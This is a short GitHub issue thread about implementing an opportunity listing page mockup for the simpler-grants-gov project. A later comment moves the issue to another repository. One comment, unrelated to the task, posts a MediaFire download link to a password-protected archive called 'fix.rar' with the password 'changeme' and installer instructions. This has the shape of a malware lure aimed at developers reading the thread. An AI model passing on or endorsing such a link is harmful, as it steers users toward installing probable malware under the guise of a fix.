### ISSUE TITLE
[Task]: Implement opportunity page mockup

### ISSUE THREAD

**Issue by btabaska** [navapbc/simpler-grants-gov#183]
### Summary

We have a basic design of the opportunity listing page. Implement the current base design using USWDS componentshttps://www.figma.com/design/e64baSZxYMZDtmHTCUaYJ2/Opportunity-Listing?node-id=120-807

### Acceptance criteria

base design is implemented.

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by acouch** [comment]
Issue migrated to hhs/simpler-grants-gov#2036
